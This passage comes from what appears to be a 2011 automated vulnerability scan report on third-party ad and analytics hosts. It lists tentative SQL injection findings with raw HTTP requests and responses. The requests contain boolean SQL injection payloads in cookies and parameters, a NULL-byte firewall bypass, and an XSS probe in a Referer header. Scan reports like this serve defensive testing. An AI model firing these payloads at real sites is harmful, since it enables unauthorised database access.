Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt117s3uxzt1tr37xzt1tr37xzt117s3uxzt117rw8; adh=1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh17san01o3n070k0r51a'%20and%201%3d1--%20; rdrlst=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; sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503s3e00q3n070k0q50qarllkxlm503s3e00q3n070k0q50qcg5lkxlm5026sw00q3n070k0q50q9rslkkpke0go550183n070k0r518am5lkkxr8002zw0113n070k0r511cd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00q3n070k0q50qcnolkxlm5026sw00q3n070k0q50qabelkxlm5026sw00q3n070k0q50qdd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00q3n070k0q50qaoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00q3n070k0q50qe3qll1dpj000000033n030k03503bq3lkxlm5026sw00q3n070k0q50qbvplkxlm5026sw00f3m000k00500aoilkxlm503s3e00n3n000k00500942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k00500bvclkxlm5026sw00q3n070k0q50qc5flkxlm5026sw00q3n070k0q50q56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00q3n070k0q50qawklkxlm5026sw00q3n070k0q50qasulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm5026sw00q3n070k0q50qc5rlkov6e0000000t3n070k0r50taw8lkxlm503s3e00q3n070k0q50qc60lkxlm5026sw00q3n070k0q50qdc4lkxlm5026sw00q3n070k0q50qd26lkxlm5026sw00q3n070k0q50qdnjlkxlm503s3e00q3n070k0q50qcbclkxlm5026sw00q3n070k0q50qc85lkxlm5026sw00q3n070k0q50qcsslkxlm503s3e00q3n070k0q50qc80lkb5u209jqc0063e000j00500ag2lkd7nq0o68m01d3n070k0r51ac1elkxlm5026sw00q3n070k0q50qc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00q3n070k0q50qc8flkxlm5026sw00q3n070k0q50qa6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00q3n070k0q50q9z6lkxlm5026sw00q3n070k0q50qdbtlkxlm5026sw00q3n070k0q50q9q4lkxlm5026sw00q3n
070k0q50qdyllkxlm5026sw00q3n070k0q50q0kllklhm40c4010053l000k005009q5lkb5u20mfs300o3l000k00500b3zlkxlm503s3e00n3n000k005000t7ljyxb412gl801l3n070k0r51adgflkkpke0f2un0183n070k0r5189mjlkxlm5026sw00f3m000k00500bo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm5026sw00q3n070k0q50qcwalkxlm5026sw00q3n070k0q50qd86lklhm40c4010053l000k00500d84lkxlm5026sw00q3n070k0q50qdqllkxlm5026sw00q3n070k0q50qdz3lkxlm5026sw00f3m000k00500cm6lkxlm5026sw00q3n070k0q50qcxdlkxlm503s3e00q3n070k0q50q719lkb5u20omkz00w3n070k0q50r71alkkpke0cw1r00i3l000k00500ctplkxlm5026sw00q3n070k0q50qcc3lkxlm5026sw00q3n070k0q50qdgilkb5u209jqc0063e000j00500cthlkxlm5026sw00q3n070k0q50q4wclkb5u20q7vh00t3n000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm503s3e00n3n000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000033n030k03503bwjlkkyy00gerj00z3n070k0r50zcbplkxlm5026sw00q3n070k0q50q9gelkxlm503s3e00n3n000k00500; vstcnt=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

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt117v98xzt1tr37xzt1tr37xzt117v98xzt117rw8; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:08:57 GMT; Path=/
Set-Cookie: adh="1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17v9801p3n080k0s51b; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:08:57 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=...[SNIP]...
...[SNIP]...

Request 2

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.medicinenet.com%2fpink_eye%2farticle.htm HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt117s3uxzt1tr37xzt1tr37xzt117s3uxzt117rw8; adh=1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh17san01o3n070k0r51a'%20and%201%3d2--%20; rdrlst=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; sglst=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; vstcnt=417k020o01dfngheqnlsvaqf150v10l20r1w4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24f204103210524mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924bgpn103210524o3dr103210l24cj2d103210224e1a9103210l24gqhl103210924d3rk10pj10m23sti21hj10a203210e24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24uzdp103210b24dret103210724e9pa10321042451gt10pj10e24styu103210924cnyl103210g24er21103210m24o2lt103210a24fj52103210924m1v2103210a23eoh127p10l24f7qr218e108203210924fgv9218e108203210a24qnab103210023l4f103210a24kd6k103210c24hqyp103210i2

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17v9901p3n080k0s51b; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:08:58 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=...[SNIP]...
...[SNIP]...

1.14. http://m.trb.com/b/ss/tribglobal/1/H.22.1/s59644513663370 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://m.trb.com
Path:   /b/ss/tribglobal/1/H.22.1/s59644513663370

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/tribglobal/1%00'/H.22.1/s59644513663370?AQB=1&ndh=1&t=11%2F4%2F2011%2010%3A4%3A53%203%20300&vmt=4D4DDB8E&ns=tribuneinteractive&pageName=zap2it%20-%20Home.&g=http%3A%2F%2Fwww.zap2it.com%2F&cc=USD&ch=zap2it%3A&server=zap2it.com&events=event5&h1=zap2it%3AHome&h2=Home&h4=Home&v20=zap2it&v21=Home&v25=First%20Visit&c30=N&c33=Wednesday&c34=8%3A30AM&c35=Weekday&c38=Home&c44=zap-2010homelayout&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: m.trb.com
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26DF7ADB851D1C52-4000012840250C07[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 11 May 2011 16:13:17 GMT
Server: Omniture DC/2.0.0
Content-Length: 404
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/tribglobal/1 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/tribglobal/1%00''/H.22.1/s59644513663370?AQB=1&ndh=1&t=11%2F4%2F2011%2010%3A4%3A53%203%20300&vmt=4D4DDB8E&ns=tribuneinteractive&pageName=zap2it%20-%20Home.&g=http%3A%2F%2Fwww.zap2it.com%2F&cc=USD&ch=zap2it%3A&server=zap2it.com&events=event5&h1=zap2it%3AHome&h2=Home&h4=Home&v20=zap2it&v21=Home&v25=First%20Visit&c30=N&c33=Wednesday&c34=8%3A30AM&c35=Weekday&c38=Home&c44=zap-2010homelayout&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: m.trb.com
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26DF7ADB851D1C52-4000012840250C07[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 11 May 2011 16:13:17 GMT
Server: Omniture DC/2.0.0
xserver: www369
Content-Length: 0
Content-Type: text/html


1.15. http://map.media6degrees.com/orbserv/hbpix [rdrlst cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The rdrlst cookie appears to be vulnerable to SQL injection attacks. The payloads 11462865'%20or%201%3d1--%20 and 11462865'%20or%201%3d2--%20 were each submitted in the rdrlst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /orbserv/hbpix?pixId=6511&pcv=42&cb=9409585524&topHref=http%3A%2F%2Fsaturdayfinds.blogspot.com%2F2011%2F05%2Fanother-pink-eye-candy-saturday.html HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://saturdayfinds.blogspot.com/2011/05/another-pink-eye-candy-saturday.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1166tcxzt1tr37xzt1tr37xzt1166tcxzt117rw8; adh="1lkkxr8160852rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; clid=2ljtllp01170xrd52zkwjuxh17rw801l3n040k0o517; rdrlst=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'%20or%201%3d1--%20; sglst=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; vstcnt=417k010r1w4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24f204103210524mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924o3dr103210l24bgpn103210524cj2d103210224gqhl103210924e1a9103210l23sti21hj10a203210e24d3rk10pj10m24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24dret103210724uzdp103210b24e9pa103210424cnyl103210g24styu10321092451gt10pj10e24er21103210m24fj52103210924o2lt103210a23eoh127p10l24m1v2103210a24f7qr218e108203210924qnab103210024fgv9218e108203210a24hqyp103210i24kd6k103210c23l4f103210a2

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt117u4nxzt1tr37xzt1tr37xzt117u4nxzt117rw8; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:44:37 GMT; Path=/
Set-Cookie: adh="1lkkxr8160852rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17u4n01m3n050k0p518; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:44:37 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=40110tell1fqc000000013n01; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:44:37 GMT; Path=/
Set-Cookie: sglst=...[SNIP]...
...[SNIP]...

Request 2

GET /orbserv/hbpix?pixId=6511&pcv=42&cb=9409585524&topHref=http%3A%2F%2Fsaturdayfinds.blogspot.com%2F2011%2F05%2Fanother-pink-eye-candy-saturday.html HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://saturdayfinds.blogspot.com/2011/05/another-pink-eye-candy-saturday.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1166tcxzt1tr37xzt1tr37xzt1166tcxzt117rw8; adh="1lkkxr8160852rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; clid=2ljtllp01170xrd52zkwjuxh17rw801l3n040k0o517; rdrlst=4300pahlkze3o0000000f3n04157olkxlm50000000n3n04144qlkze3o0000000f3n0413y7lkze3o0000000f3n040hsnlkze3o0000000f3n0415sklkkpqq000000103n0412nslkxrxz0000000h3n0412gdlkkyy00000000w3n040morlkkxrb0000000x3n0414k6lkxlm50000000n3n040w35lkze3o0000000f3n0413pylkze3o0000000f3n0414rwlkxlm50000000n3n041628lkze3y0000000d3n04132dlkzsmp000000063n0414khlkxlm50000000n3n041196lkkkbe000000163n0413x4lkxrxz0000000h3n0413qmlkze3y0000000d3n041195lkkpqh000000113n041194lkkjj4000000173n0416nulkxlm50000000n3n0413q8lkze3y0000000d3n041193lkkplo000000133n041192lkkpke000000153n040p46lkkpqq000000103n040zg4lkze3y0000000d3n04144elkze3o0000000f3n0413qwlkze4r0000000c3n0410poljyxb40000001i3n04106llkzt2k000000053n040e6llkl0r50000000t3n0416dnlkze3o0000000f3n04138olkxrxz0000000h3n04167ulkxq410000000i3n04159olk8fax0000001d3n0414qllkxlm50000000n3n0415halkxlm50000000n3n040m0plkkxrb0000000x3n0416e6lkxnbq0000000m3n0413zblkze3y0000000d3n0414xnlkxlm50000000n3n0416dxlkze3o0000000f3n041391lkxrxz0000000h3n0415zhlkze3y0000000d3n041672lkkxrb0000000x3n040ycrlkncow0000000r3n04158mlkze3o0000000f3n040okclkze3o0000000f3n041015lkze3y0000000d3n0413lelkxrxz0000000h3n0413yolkze3o0000000f3n040ojulkze3o0000000f3n041240lkxrxz0000000h3n0414ozlkxlm50000000n3n0414bmlkxrxz0000000h3n041590lkzsm2000000073n0414j7lkxlm50000000n3n0414bzlkxlm50000000n3n0411pjlkxrxz0000000h3n040p01lkze3o0000000f3n0415holkxlm50000000n3n040m7alkkxrb0000000x3n0413mklkxrxz0000000h3n04101ulkze3o0000000f3n0412zglkxrxz0000000h3n0413lxlkxrxz0000000h3n040zp4lkze3o0000000f3n04
148ilkxlm50000000n3n040xvclkze3o0000000f3n0412yxlkxrxz0000000h3n0415iglkxq0l0000000j3n0413n7lkze3y0000000d3n0416s2lkxpyu0000000k3n0414hplkxlm50000000n3n040znmlk34620000001g3n0414hclkxlm50000000n3n040wd7lkze3o0000000f3n04102plkxrxz0000000h3n0410tylkkpku000000143n040p1alkze3o0000000f3n0400bvlk9pe80000001c3n0415xylk60qe0000001f3n0410lxlkxrxz0000000h3n04103blkxrxz0000000h3n0410telkd7nq0000001a3n0416rslkxppm0000000l3n040c9slk9pe80000001c3n0413mxlkze3o0000000f3n0412emlkze3o0000000f3n0410rdlkdkly000000183n040z9zlkze3y0000000d3n04163plkxlm50000000n3n040z9xlkze3o0000000f3n040m40lkkxrb0000000x3n040zqylkxrxz0000000h3n040mjelkkxrb0000000x3n0412qnlkkplt000000123n0414e9lkze3o0000000f3n0412x6lkxrxz0000000h3n041342lkze3y0000000d3n0416aulkze3o0000000f3n0416atlkxlm50000000n3n041203lkb5u20000001b3n04163clkxlm50000000n3n040afqlkze3o0000000f3n040o0vlkkpqx0000000z3n040z2ilkkxrb0000000x3n0411462865'%20or%201%3d2--%20; sglst=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; vstcnt=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

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lkkxr8160852rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17u4p01m3n050k0p518; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:44:38 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=40110tell1fqe000000013n01; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:44:38 GMT; Path=/
Set-Cookie: sglst=2260sbpelkxlm5026sw00f3m000k00500dsnlkxlm5026sw00o3n050k0o50oarllkxlm5026sw00o3n050k0o50ocg5lkxlm5026sw00o3n050k0o50o9rslkkpke0f2un0163n050k0p516am5lkkxr8002zw00z3n050k0p50zcd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00o3n050k0o50ocnolkxlm5026sw00o3n050k0o50oabelkxlm5026sw00o3n050k0o50odd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00o3n050k0o50oaoplkb5u209jqc0063e000j00500cnxlkxlm501sim00o3n050k0o50obq3lkxlm5026sw00o3n050k0o50obvplkxlm5026sw00f3m000k00500aoilkxlm501sim00o3n050k0o50o942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm501sim00o3n050k0o50obvclkxlm5026sw00o3n050k0o50oc5flkxlm5026sw00o3n050k0o50o56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00o3n050k0o50oawklkxlm5026sw00o3n050k0o50oasulkb5u209jqc0063e000j00500crplkxlm501sim00o3n050k0o50oasqlkxlm5026sw00o3n050k0o50oc5rlkov6e0000000r3n050k0p50raw8lkxlm5026sw00o3n050k0o50oc60lkxlm5026sw00o3n050k0o50odc4lkxlm5026sw00o3n050k0o50od26lkxlm5026sw00o3n050k0o50odnjlkxlm5026sw00o3n050k0o50ocbclkxlm5026sw00o3n050k0o50oc85lkxlm5026sw00o3n050k0o50ocsslkxlm5026sw00o3n050k0o50oc80lkb5u209jqc0063e000j00500ag2lkd7nq0o82o01b3n050k0p518c1elkxlm5026sw00o3n050k0o50oc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00o3n050k0o50oc8flkxlm5026sw00o3n050k0o50oa6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00o3n050k0o50o9z6lk
...[SNIP]...

1.16. http://p.addthis.com/pixel [key parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://p.addthis.com
Path:   /pixel

Issue detail

The key parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the key parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pixel?pixelID=57148&partnerID=115&key=segment%00' HTTP/1.1
Host: p.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uid=4dab4fa85facd099; uit=1; psc=3; di=1305052650.60|1305052650.1FE|1304962167.19F|1304955482.1OD; dt=X

Response 1

HTTP/1.0 200 OK
Content-Type: text/html
Connection: close
X-Error-Code: 503
Content-Length: 0


Request 2

GET /pixel?pixelID=57148&partnerID=115&key=segment%00'' HTTP/1.1
Host: p.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uid=4dab4fa85facd099; uit=1; psc=3; di=1305052650.60|1305052650.1FE|1304962167.19F|1304955482.1OD; dt=X

Response 2

HTTP/1.1 302 Found
Date: Wed, 11 May 2011 15:40:01 GMT
Location: http://va.px.invitemedia.com/pixel?key=segment%00%27%27&pixelID=57148&partner_uid=&partnerID=115
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


1.17. http://player.ooyala.com/player.js [autoplay parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://player.ooyala.com
Path:   /player.js

Issue detail

The autoplay parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the autoplay parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /player.js?autoplay=0'%20and%201%3d1--%20&width=900&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&height=506&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr HTTP/1.1
Host: player.ooyala.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tressugar.com/Cannes-Film-Festival-History-16415520c7b9a%22-alert(1)-%226d84b52305d

Response 1

HTTP/1.1 200 OK
Last-Modified: Wed, 11 May 2011 15:59:01 GMT
Content-Type: text/javascript; charset=utf-8
Cache-Control: private, max-age=300
